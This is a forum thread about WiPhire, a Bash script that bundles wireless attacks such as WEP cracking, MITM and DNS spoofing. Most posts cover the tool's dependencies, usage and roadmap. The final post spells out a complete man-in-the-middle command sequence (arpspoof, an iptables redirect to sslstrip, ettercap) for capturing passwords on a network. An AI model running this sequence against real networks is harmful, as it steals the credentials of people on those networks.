If this is your first visit, be sure to
check out the Forum Rules by clicking the
link above. You may have to register
before you can post: click the register link above to proceed. To start viewing messages,
select the forum that you want to visit from the selection below.

WiPhire - Wireless Pentesting Tool

WiPhire is a Bash script aimed at making all of the standard wireless attacks a lot easier to perform.

Requirements:
This script was written on Backtrack 4 and designed to be used with Backtrack 4. You can try to run it on other OS's but I will not be modifying this for any other OS; you will have to do that yourself. This was also designed to be used with the Alfa AWUS036H Wireless adapter with the RTL8187 chipset. If you do not have this chipset but another adapter that is compatible with the aircrack-ng suite you will need to put it into monitor mode prior to running the script if you wish to use an option that needs monitor mode enabled. You can do this with 'airmon-ng start <interface>'. Also do note that this script needs to be ran as root.

Programs that WiPhire Uses:
- airmon-ng
- airodump-ng
- aireplay-ng
- aircrack-ng
- airdrop-ng (Requires directory /pentest/wireless/airdrop-ng/)
- xterm
- crunch (Requires directory /pentest/passwords/crunch)
- pyrit
- sslstrip
- arpspoof
- macchanger
- kate
- apache2 (Requires directory /etc/init.d/apache2)
- ettercap
- firefox (Trivial)
Usage:
To use this Bash script (Or any Bash script) You need to take the script and place it somewhere that you can remember. For this example i will just use /root/. Now if you are root and you have the script on your desktop, open up a terminal and type ./WiPhire. This will now run the script. If you get a permissions error you will need to change the permissions to make the script executable 'chmod 777 ./WiPhire' This will now allow you to run it. If the script is stored in a different location you need to change the directory to the location before running the script. For example if the script was in a folder called 'scripts' on roots desktop we would run 'cd /root/scripts/' Then we would run './WiPhire'.

Re: WiPhire - Wireless Pentesting Tool

Re: WiPhire - Wireless Pentesting Tool

Not sure we need *another* one of these however if you want the submission of your tool to be taken seriously you have to point out why your tool is better than some of the current ones and what does it do that the other tools do not.

Re: WiPhire - Wireless Pentesting Tool

For future versions on this, i intend to make it it even more user friendly and allow a greater variety options to be available for the individual operations. So for example include cpyrit set up with a GPU, alternate methods of generating packets for WEP cracking, more in depth options for DNS spoofing, more options for MITM attacks and maybe including a utility for mdk3. Also i would like to incorporate any new methods and techniques discovered in the coming months/years.

The idea for WiPhire is that it becomes the wireless equivalent of SET (Social Engineers Toolkit), If you look at SET and WiPhire you can see that they are both trying to be an all encompassing tool for the subject. The idea is that WiPhire will have an option for every major wireless operation.

To be honest i haven't really seen many scripts of this caliber in the wireless field. I have seen quite a few WEP cracking scripts and a couple of MITM scripts, but there isn't anything to my knowledge that has everything in one package.

I would like some feed back as to what needs to be improved/included in future versions, so any one who has downloaded a response would be great!

Re: WiPhire - Wireless Pentesting Tool

I liked your solution for finding the wireless cards. needs a bit more development but its the right idea. also LOL at redirecting to fbi.gov. I know its harmless but you might want to take that out.

Originally Posted by Middle

For future versions on this, i intend to make it it even more user friendly and allow a greater variety options to be available for the individual operations. So for example include cpyrit set up with a GPU, alternate methods of generating packets for WEP cracking, more in depth options for DNS spoofing, more options for MITM attacks and maybe including a utility for mdk3. Also i would like to incorporate any new methods and techniques discovered in the coming months/years.

The idea for WiPhire is that it becomes the wireless equivalent of SET (Social Engineers Toolkit), If you look at SET and WiPhire you can see that they are both trying to be an all encompassing tool for the subject. The idea is that WiPhire will have an option for every major wireless operation.

To be honest i haven't really seen many scripts of this caliber in the wireless field. I have seen quite a few WEP cracking scripts and a couple of MITM scripts, but there isn't anything to my knowledge that has everything in one package.

I would like some feed back as to what needs to be improved/included in future versions, so any one who has downloaded a response would be great!

Thanks

"Never do anything against conscience -- even if the state demands it."
-- Albert Einstein

Re: WiPhire - Wireless Pentesting Tool

Thanks a lot for the feedback i was starting to think that i would never hear any!

I think that if i can generate some interest and have it seriously considered for inclusion with Backtrack then i will go through it and make it as polished as i can! It is so annoying that no matter how many times you check something, prior to its release you will notice another problem...

I have had 136 downloads form my source forge page alone, and i have not advertised that page any where else to thanks a lot guys! In total i have had over 300 downloads in just under two weeks =]

Re: WiPhire - Wireless Pentesting Tool

I do actually plan to test it my self because from the menu/post if it behaves as advertised it seems like it would be cool. I just have not had the time recently but it is on my to do list and i will leave some feed back here.

Re: WiPhire - Wireless Pentesting Tool

Re: WiPhire - Wireless Pentesting Tool

hey mann i tried wiphire it's a dream coming true for me 10x for your script i rly adore it but i have a suggestion if you can make the mitm in a different way like gotmilk did look what i mean: kate /etc/etter.conf
>*uncomment redir_command_off in the iptables, linux section*
echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i wlan0 -t 192.168.1.1
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
sslstrip -a -k -f
ettercap -T -q -i wlan0
in this method the password appear in ethercap without searching